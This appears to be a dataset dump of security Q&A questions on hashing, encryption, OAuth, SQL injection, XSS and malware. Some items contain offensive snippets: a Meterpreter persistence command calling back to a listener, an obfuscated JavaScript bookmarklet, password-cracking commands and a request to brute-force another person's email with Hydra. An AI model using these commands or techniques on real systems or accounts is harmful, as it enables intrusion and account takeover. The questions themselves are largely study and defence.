instruction stringlengths 24 29.9k |
|---|
The common advice of benchmarking a password hashing algorithm and choosing the slowest acceptable cost factor doesn't work for algorithms with more than one parameter: adding a lot of iterations at the expense of memory hardness makes the benchmark time go up, but if the attacker can still grab off-the-shelf hardware ... |
Is Parrot OS as secure as Tails?
Tails is running from USB, loading to RAM so it means that it doesn't use local computer storage. After each start, Tails starts a new session and doesn't store files you had in previous sessions. It means that you can browse using flash drive where installed Tails on someone's computer... |
We can implement MAC (Mandatory Access Control) and DAC (Discretionary Access Control) together and they can complement each other. My understanding is when MAC is there it overrides everything. Can anyone help me understand how they can work together?
|
In general, I understand the principle of Diffie-Hellman key exchange. What I don't understand is what is so fundamental about primitive roots modulo p that guarantees that the shared secret is the same. I'll use the notation similar from the Wikipedia Diffie-Hellman Key Exchange article,
Alice has private key, a.
Alic... |
How does a computer get infected with watch-video.net malware, and why aren't popular tools like windows defender or malwarebytes able to detect and remove it? Is there a practical way to prevent these types of things at the network level?
When i do a search online the only results that I see are from what look like bo... |
I have an old computer that is no longer working and I want to donate it or perhaps throw it in the trash. However, I don't want people to potentially get my banking account data, usernames/passwords I have entered on the computer, software installed, legal or medical documents, internet browser data, etc. I am going t... |
We recently switched to a Synology enterprise setup at work and we're hoping to benefit from the additional logging that comes with Synology software. In response to a security incident, I found log entries that suggested a user accessed a file over SMB they may not have accessed.
To prove the theory, I mounted a SMB s... |
We are deploying O365 in my company (Teams, Sharepoint, Exchange online, Office suite). In order to connect outside our network (remote workers especially during this pandemic), we've implemented MFA with MS Authenticator and OTP with SMS.
Some users use their professional phones, others their personal ones for MFA, bu... |
I've created a GPG key on a newly installed Debian virtual machine. I've noticed that most keys I've seen begin with 0x, however the one I created doesn't. I selected 'RSA (set your own capabilities)' with a 4096 bit key size. Should I create again this key?
|
I have a simple HTML-PHP-CSS contact form (no JavaScript) with some trivial fields sent via PHP's mail() function. One of the fields is "website" field in which a user should input a website domain (if relevant).
If I add to the form field with input type="url" it obligates users to add a protocol prefix such as http:... |
What are the technical reasons not to use non-reversible transformation when encrypting password in database? That way, even when password database is leaked, nobody can read any password. If it is reversible ,it would fail to comply with some standards ,e.g.French National Commission on Informatics and Liberty. Is it ... |
Why is supporting digest authentication necessary instead of other more secure ways like applying non-reversible transformation to password to encrypt them? Is it because the receiving end cannot process and verify?
|
I am new to SSL certs and trying to self sign the certs from forwarder to indexers:
https://docs.splunk.com/Documentation/Splunk/8.1.3/Security/HowtoprepareyoursignedcertificatesforSplunk
cat myServerCertificate.pem myServerPrivateKey.key myCACertificate.pem > myNewServerCertificate.pem
why will private keys go to a ce... |
In the development of an organization's web system (containing sensitive information) with credentials, where the actions carried out must be monitored, what information should I keep when each action takes place?
For example, let's suppose the administrator accepts a transaction and months later he says "It wasn't me"... |
I think I really misunderstand something about data encryption. This guide (https://docs.mongodb.com/manual/core/security-client-side-encryption/#randomized-encryption) says the following:
"Encrypting the personal_information and phone_numbers fields using the randomized encryption algorithm encrypts the entire object.... |
I would like to use an AWS S3 bucket to store my IoT firmware file and allows all of my IoT devices to access it to update the firmware to the latest version.
I want that the firmware file in the S3 bucket is secret to only me and my devices. But I don't want to embed any credentials inside the devices. And I cannot us... |
I was reading a recent report about an APT and jumped into this Technique:
https://attack.mitre.org/techniques/T1203/
This technique is called:
Exploitation for Client Execution
And that might match with what a macro is. However, the description says the following:
Adversaries may exploit software vulnerabilities in... |
I'm solving this challenge/lab where SQLi is inside the cookie parameter. After solving it manually, I thought to check if it can extract data. I used sqlmap with --cookie=COOKIE* (Notice * that's the marker to tell sqlmap about the injection point) and --level=2 (Level 2 means look for flaws in cookie parameters along... |
I have been trying to do this for hours and can´t really figure this out.
How can I pass only this range of signs to John the Ripper?
./john hashes --mask=Pepito[1234567890!"·$%&/()=|@#~€]--min-length=9 --max-length=21
I basically know half of the password and know the variation will be between those characters but si... |
Procedure:
Create keypair on a live distro, upload public key, move secret subkeys to Yubikey
Reboot into normal disto
Plug in yubikey, and then remove it
Run gpg --recv-keys HANDLE to receive public key
Run gpg --list-secret-keys.
The result is that the secret key stubs show up in the secret key list. Running gpg --... |
I clicked on a link in discord not knowing it was a grabify link.
I understand that an IP only gives your general location but what else can someone do with my IP?
Can they find a way to access my computer and listen to my mic or look through my webcam?
Is malware usually attached to grabify links?
|
I have read that IV's are used with block ciphers in case a sequence is repeated in a message and produces repeated sequences in the ciphertext.
I see IV's being used in cases where the message is very short, though (e.g. 11 bytes in the example on the attr_encrypted Ruby gem README). Does the use of a unique IV also ... |
I have a Yubikey 5, I can store a PGP key inside, it has OTP abilities, FIDO, NFC, etc... Which is great for a device like this.
First of all, I understand how a smart card is more secured than an app/sms based OTP for instance, but seeing how the market is doing, I don’t get why it’s still considered more secured.
2FA... |
Is there a security rule on correct masking for sensitive information? Let's say we want to use prod data in our UAT environment. We're thinking of creating a masking logic when we transfer prod data to UAT. Changing the fields would look something like this:
Names:
e.g. John Doe to JXXXXXe
Mobile Number
e.g. +1-234-... |
I've been reading about PWK-Example-Report-v1.pdf on pages 7-14 and found that KikChat apps were used in the example.
https://www.exploit-db.com/exploits/30235
Copy of the vulnerable app is available at exploit-db.
However, the actual exploit code/script is no longer there.
I was wondering what is the content of the ex... |
I would like to verify that users are running particular source code. Is there a way this could be achieved?
I want to verify that the original "algorithm" has been followed correctly if you will. What I need is for the user to send "pure" (not tampered) GPS traces.
Since Trusted Execution Environments are used for str... |
Reading around I gather that for a Restful API since you don't use cookies,then you send the token in the Auth header.Correct so far?
When on a traditional MVC app ,do you send the token inside a httponly cookie? Does then the server have to parse the cookie in order to extract the token?
If that's the deal then why us... |
The output is:
<img src="http://example.com/[input]" oncontextmenu="openUrl('http://example.com/[input]')">
Where [input] is the user input, which is sanitised through this function:
a => {
a = String(a);
a = this.replaceAll(a, "&", "&");
a = this.replaceAll(a, '"', """);
a = this.replaceAll(a, "'", "&... |
I switched all my servers to ssh publickey login and disabled password login about a week ago (root login IS still enabled). I also run Fail2ban and logwatch.
Why is there still login attempts showing up in the logs? I admit the number of attempts is down to low double digits, but shouldn’t there basically be none? A... |
I've been trying to find the major differences between "U2F" versus "FIDO2" two-factor authentication standards. Reading some of the articles posted by different companies and even the FIDO site itself give the impression that the main work of the FIDO2 standard was the WebAuthn API, and that both U2F and FIDO2 are bas... |
Is there any tool that accepts a packet capture file as input and displays all the network traffic in a similar way to how a SIEM displays log information? I'm looking for a summary of the ports and IPs to get a good overview of a packet capture.
|
My company uses an Anti-Spoofing Protection based on the SPF Record and has implemented DMARC. Often our users correspond via a "secure" messaging platform like Proofpoint/ZIX/IronPort from their counterparts. However, when our users respond on those platforms, the platforms respond on their behalf "spoofing" their ema... |
I've recently started to automate a lot of my tasks for my private VPS. A significant part of working with this server is ensuring the nginx webserver, which handles a reverse proxy to multiple applications and a static website, is running and correctly configured.
Though when working with complex configs or debugging ... |
Set up:
Victim: 192.168.0.2
Attacker (also having SSH server installed): 192.168.0.3
SSH server: 192.168.0.4
I perform a successful ARP Spoofing attack (being obviously the attacker's MAC address):
But when I try to connect via ssh user@192.168.0.4, instead of connecting to the attacker's ssh server, it redirects th... |
My company provided me with a MacBook for work. I was the one that took the laptop out of the sealed box and I was the one to set it up. I only had to install the tunnelblick VPN client and use the tunnelblick (certificate) file (fileName.tblk) that was explicitly generated for me. No other IT/administration/device man... |
CAA, or Certificate Authority Authorization, provides a way to designate which CAs are allowed to create a Certificate for specific domains. This is done accomplished by publishing new caa DNS records, with three directives: issue issuewild iodef. For example:
$ dig craigslist.org caa
craigslist.org. 300 ... |
I need to send and check email (via IMAP email servers) from my web app. Storing credentials on server seems like problem as they are almost always plain text.
So if I store them in client browser's storage how security risk this could be? Is there any way to make this secure without access to OS security enclaves like... |
Let's say I visit a website that could potentially infect my computer by just from visiting it. If I disable JavaScript, is it still possible to infect my computer?
I have already searched the site for this question, but I only find questions like this that don't mention disabling JavaScript
|
Both mail accounts, ProtonMail and Tutanota are encrypted, and as the knowledge base from ProtonMail states, ‘emails from ProtonMail users to non-ProtonMail users’ are ‘otherwise encrypted with TLS if the non-ProtonMail mail server supports it’.
So, since the email is encrypted at both ends, at ProtonMail and at Tutano... |
Will encrypting a dual boot OS prevent viruses from spreading between the two? Also does linux have any MBR viruses? Will locking the bios in Windows and GRUB stop viruses from attaching and infecting them?
|
I have some programming experience, but am having trouble with SQL injection code. I don't understand why there's sometimes SQL syntax after the comment character (such as -- or #). I know that -- - and --+ are just required comments syntax, but there are injection examples with much more complex syntax after the comme... |
I am testing a website (bug bounty website) and found an endpoint like replycomment?cmt_id[]=1. When open on browser, this endpoint let me reply to comment with id 1 by fetching this comment into a textarea and format it for me.
So i can do like replycomment?cmt_id[]=1,2,3,4 to fetch value of multiple comments.
I try t... |
Assuming if you do via SSH (which is shared among multiple team members), how to manage this from a security perspective or should each user be given a separate SSH key
|
Do FIPS 140-2 or related documens specify how to protect users' passwords with encryption? Are there any well known schemas for storing passwords in lossless manner and lossy manner?
|
[Crossposting from SO]
I am trying to make a port scanner in Python and trying to list which all ports are accessible by anyone remotely.
Using the socket.connect_ex package, I was able to check which all ports are open for my local machine to use, but couldn't find a way on how to check what all ports anyone on the in... |
I am working on a "Hack me" challenge, I have access to apache account in the server, I tried to get root access, I run linpeas.sh script and linpeas didn't find anything special, however, there is a file /etc/profile.d/modules.csh which I have write permission on that
However, this file is a symbolic link to another f... |
I'm failing a security scan that is saying my .NET application is allowing verb tunneling and the recommendation is to disable this. The application needs to accept PUT and DELETE headers as well as GET and POST. The scan is sending these headers on an endpoint that accepts POSTs:
X-HTTP-METHOD: PUT
X-HTTP-Method-Overr... |
My Challenge
My project has a requirement that we use only FIPS-validated modules to do anything cryptographic, including generating checksums for binaries. We've been using the SHA-2 utilities provided by GNU coreutils for a long time to generate checksums. Now we need to be compliant. SHA-2 comes from FIPS-180-2, and... |
This year, since many students are online, College Board (the company that administers AP Exams in the US, along with the SAT) recently released its Digital Testing App. Once installed, and going through a setup, it allows you to go through a test demo to mirror the actual test conditions. However, once you do, it cove... |
SVG image can be used in DOS user browser with billion laugh attack. Can we do the same with other image types? especially GIF?
Thanks everyone.
|
Given a commercial website buy.com and a user with a Facebook account in facebook.com, the user has third-party cookies disabled in the browser.
If a user is logged in their Facebook account and visits facebook.com, Facebook can set first-party cookies for facebook.com
Now the user visits buy.com, the site uses a web b... |
I'm writing a RESTful API for a website I'm building and it has methods that use user permissions. For example, I have a method called removeResource(resource_id: int, user: string). The larger pipeline is the user logs in which called an API method that checks their username and password, then if their password is cor... |
I am interested in exposing web content to strangers on the internet (Reddit, Discord, ..).
This content I wish to reside on the same web server under which personal web content resides.
(None of this content yet exists, and I'm not set on a specific web server or programming language.)
VPS (with single IP Address and ... |
I'm trying to understand the different roles that DoT / DoH and HTTPS are playing when it comes to protecting sensitive data in the internet. I spend the day reading a lot of stuff about DoT, HTTPS, TCP and IP.
But there is one thing that doesn't become clear to me: say I want to surf to https://www.myForbiddenSite.org... |
I was trying to use a state-owned mobile payment app to conduct some transaction on the internet and, thanks to an error message, I found out that my card number and the amount I'm paying were sent via a GET request.
Other data on the request: the name of the service and an HMAC. And, yes, it's on HTTPS but I don't bel... |
On my Android phone I use several apps that propose biometric authentication. If I enable it, can these applications read my fingerprint data and transfer it to the third party servers?
|
Today I was playing around with an SslStream implementation in C#, and was able to create a client/server connection over TCP. Also to verify it, I used wireshark to ensure that the data was in fact encrypted, but I have a couple of questions.
First, I should explain the process I went through.
Create a TCP client wit... |
One of the banks that provides identity theft monitoring to accountholders notified me that my email address was included in a recent data breach, along with a password, but without any indication of where this email and password was used. I asked if they could provide the (already compromised) password so I could fin... |
From what I have understood, for public facing clients such as JavaScript apps that run on the browser or mobile apps which have no backend there is no secure place to store client id and secret. Therefore, the client will generate a random string code a.k.a code challenge (plain).
And then:
Client sends ClientID, secr... |
One commonly used iptables rule for Linux servers is this:
# iptables -A INPUT -i lo -j ACCEPT
Can we assume that this rule will only accept traffic which is sent from the local machine?
Is it possible for a remote attacker to craft a packet that says "I arrived through the loopback interface", even if the packet arri... |
As per my understanding both JWT and Basic Auth used to store login credentials on client side and avoid sessions for better scalability. I understand with Basic Auth login credentials will be sent along with each request which is a security risk incase of http but with https these credentials will be encrypted which ... |
My question is pretty short: is passlib cryptocontext verify method vulnerable to timing attacks, which would an attacker allow to narrow down the real password?
|
I'm trying to get into my friend's email (he is okay with it, we discussed it) and I'm using Hydra, but it has a limit to its bruteforcing that I can't seem to bypass, does anyone know how I can?
|
We have a web application that stores cached information in browser (both is firefox and chrome).
When we subjected it to Penetration Testing, a finding was filed saying that "Senstive Data such as Database Name, Storage and Version were found stored in the local IndexedDB".
Although clicking each DB do not reveal any ... |
I have came across a REST API for some commercial software, that checks authentication by requiring HMAC on concatenation of
http_method (GET, PUT, etc)
timestamp
payload (body of a POST / PUT request if any)
path (everything between https://domain.tld and the first question mark)
This HMAC then is passed in a reques... |
I'm trying to validate / test and XSS attack; however when I navigate to the page, the browser (tried on Chrome and Edge) tells me:
A parser-blocking, cross site (i.e. different eTLD+1) script,
is invoked via document.write. The network
request for this script MAY be blocked by the browser in this or a
future page loa... |
I'm trying to run my hashcat as automated and efficient as possible.
I have a file with NTLM hashes:
607C4CDCDA0EFBF023C4DEA52DF90641
D25ECD13FDDBB542D2E16DA4F9E0333D
AAD063F78DA1183CBD8BD7812FADF9C6
CAD4D65FCEA4B029A54DC1161A0C0456
38D7BBBC05F6BBB4ABC047E707029429
BFED4B770BF3578B26B623ED98F9091A
53760E5D6473ECDE30E04... |
I've been watching videos of scammers being tricked. Frequently, the scammer makes their scam victim install some weird "remote desktop" program claimed to be for tech support purposes. These programs apparently allow the person connecting to the host (victim) computer to "black the screen" so that it becomes impossibl... |
I'm developing an application that will connect to Microsoft SQL Server in a local network:
I'm considering whether these connections need to use TLS
Or whether to leave it to the customer's administrators to use an encrypted tunnel, if they see fit. they may have other third party applications, also connecting to SQL... |
Some time ago, Bluetooth was hit by a severe exploit (KNOB attack) that rendered its encryption pretty much useless. Publishers like the German Heise summarized it in an article* as an issue in the firmware of Bluetooth radio affecting BR/EDR only. Therefore, BLE appears to be still secure. My question is if that's rea... |
Considering using echo -n "passphrase" | gpg --batch --passphrase-fd 0 ... inside of Bash script (which should mitigate leaking passphrase to process list given echo is a built-in command, right?).
I need to know passphrase to create shares of it using Shamir Secret Sharing later in the script.
How can I supply string ... |
Can an attacker from global network hack a database located on office machine inside of local office network? For example after hacking a router, a gateway or the very machine? Or maybe there is another way for him? Is it possible to make local network with database absolutely secure? Maybe to turn the database on just... |
I've taken measures and thoughts on how to securely store and manage my key pair. In the process of it a few questions arose, which I'm not capable of answering yet. My key pair will be used to encrypt passwords and documents of banks, insurances, invoices, photos and the like. All this data is not publicly available. ... |
I installed the lastest version of PostgreSQL (13.2) to understand it better and I used the command SELECT usename, passwd from pg_shadow; to extract the hash with the default username postgres but I could not find any documantation of how to crack the password hash using john or hashcat so how can I do that ?
the hash... |
Ctrl+Alt+Del is a secure attention sequence (Microsoft) (or secure attention key (Wikipedia), but it's more a Linux term).
As we can read,
A key sequence that begins the process of logging on or off. The default sequence is CTRL+ALT+DEL.
it is only the default sequence, which means that other sequences might exist. I... |
Is it safe to refresh your access token using your access token (assuming of course it is still valid)?
And, if not, what makes a refresh token that much more special that it is safe to be used as a means of refreshing access tokens?
|
I find that names and terms used in relation to Trusted (Trustworthy, Confidential,..) Computing are highly interchanged and thus creating confusion for laymen as am I.
Trusted Computing has been around since the 90's and the idea is being tried to be kept up to date with today's standards but the initial idea is that ... |
On the website of some company, it is possible to send personal data using a form. The browser I'm using says that the connection is secure.
Is it completely secure to send personal data via the form?
Is there any possibility that an attacker can grab the data, or maybe the data could be stored anywhere between my PC a... |
I was told that IP whitelisting should not be considered safe and are hence obsolete.
I fail to understand why this statement holds: can IPs be impersonated? if not, then why is it a bad/obsolete way of securing a service? (assuming the traffic can't be sniffed)
|
This proposal concerns a strategy for isolating the permissions given to plugins in a plugin architecture. I'm looking for insight into whether this design can succeed in isolating those permissions.
Access to the entire site is controlled via OAuth2. That is, on first logging in, a user completed the oauth flow. On su... |
I know that my ISP can detect when I am using a VPN, but can it see which protocol I am using?
|
A friend of mine wants to use a Proxy on his home computer because his parents have blocked many games and social media services. My question is, if he is using a Proxy, will his parents be able to see that he is using a Proxy?
|
I understand that there are multiple reasons that a recovery key might be needed on a system partition, but why would I want the extra security risk of having a way of circumventing my password for removable media?
Why is windows asking for my recovery key?
Windows will require a BitLocker recovery key when it detects... |
Update (April 15): The forked repo and the user do not exist any more.
Yesterday, one of my GitHub projects was forked and there is a suspicious commit on the fork of the repo. As you can see from the commit the GitHub Actions configuration installs ngrok on the server, enables firewall access to rdp and enables rdp on... |
Our small company needs to store sensitive data in the cloud. We are debating VPS's or rented bare-metal servers due to cost. Our threat model includes malicious sysadmins working at the hosting provider and this is what we are focusing on, not side-channel attacks from other customers on the VPS etc. Our policies requ... |
SCTP INIT has client random parameter.
SCTP INIT ACK has server random parameter.
There are no shared keys.
Using SHA-1, what key does the client or server use when performing the HMAC calculation?
Does the sender use their own random parameter as the key?
|
I gather from the cryptsetup manpages that LUKS2 uses argon2i by default for strengthening a user-password to decrypt the partition. However if a 256 bit keyfile with data from /dev/random, how does a KDF make guessing that password harder?
Wouldn't you just have the 2^256 probability either way then? So an attacker wo... |
Is RCE (Remote Code Execution) just ACE (Arbitrary Code Execution) over a network or is there an example where RCE is not ACE? Is RCE always the more severe of the two (with respect to gaining system admin privileges), or would it depend on what application has the vulnerability (and system privileges that app runs wit... |
I'm building a URL-shortening tool. For an arbitrary link, I need to produce a fixed-length slug which will index the full URL in a database. For prettiness reasons, I'd like to keep the slug reasonably short (8 alphanumerical characters seems reasonable).
It seems obvious to me that using a hash function with output t... |
javascript: var _0x1166=['\x72\x65\x74\x75\x72\x6e\x20','\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65\x6e\x65\x72','\x6b\x65\x79\x64\x6f\x77\x6e','\x6b\x65\x79\x43\x6f\x64\x65','\x6e\x67\x2d\x62\x69\x6e\x64\x69\x6e\x67\x20\x62\x74\x6e\x20\x62\x74\x6e\x2d\x6d\x69\x6e\x69\x20\x62\x74\x6e\x2d\x62\x6c\x75\x65\x20\x... |
I have 2 YubiKeys and want one of them to be a backup. So let's say I generated a key $KEY in my computer with an encryption subkey. I need to export the secret keys, because when moving them to the card they disappear, and then reimport them.
So I export them with
gpg2 -a -o secmain.asc --export-secret-key --armor $KE... |
I have implemented an authentication system which works like this:
Upon successful login, the server takes the username of client and encrypts it with AES-256.
This ciphertext is stored in the client's browser and when the client wants to do something which requires login, this ciphertext is sent to the server. The s... |
The following constraints apply
cannot use physical storage medium (such as Safe/ Vault)
the service used to store secret/ password should be highly available and accessible from anywhere in the world.
|
I just noticed that AWS provides a service that checks your users' passwords for corporate password rule compliance "periodically": https://docs.aws.amazon.com/config/latest/developerguide/iam-password-policy.html
This makes me afraid that AWS stores encrypted passwords instead of storing hashes of passwords. Is that t... |
Here is the scenario:
running id gives this :
uid=1001(test1) gid=1001(test1) euid=1000(bl4ckc4t) groups=1001(test1) -
This means that I am user test1, but my euid is set to another user.
My goal is to get my uid to change to 1000 from my current position with my euid being 1000.
The problem is that running something l... |
Maybe someone can help me.
I have to decrypt the Vigenere Chiffre : AAAAAAAAAAAA
This is all what is given. So I have no keylength or something. I think I'm not supposed to do a brute force attack.
I actually do know how the decryption with Vigenere works. I have already written a program for a different text to transl... |
How to solve this error?
meterpreter > run persistence -S -i 7 -p 4444 -r 192.168.134.129
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.ms... |
I'm looking to verify the security of the OAuth mechanism for an application I'm testing. The application uses Okta for SSO and the PKCE OAuth flow.
What I'm not clear on is how the backend is verifying the Access Token, given the configuration supplied to the Okta SDK. The only configuration passed to the SDK is the O... |
The reason I am asking this is the following:
My boss wants me to sell a backup solution where encrypted backups are to be stored at our site. But we shouldn't have the key to decrypt them (in case we are hacked). The backups should also only be tested on the client's side, not on ours. Because according to him, this w... |
When you establish a new SSL connection, during handshake the server sends you his certificate together with public key. Then the browser checks the certificate againts CA. However I do not understand based on what the CA decides that the server I want to talk to is the corrent one ? Is it based on the IP address ?
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.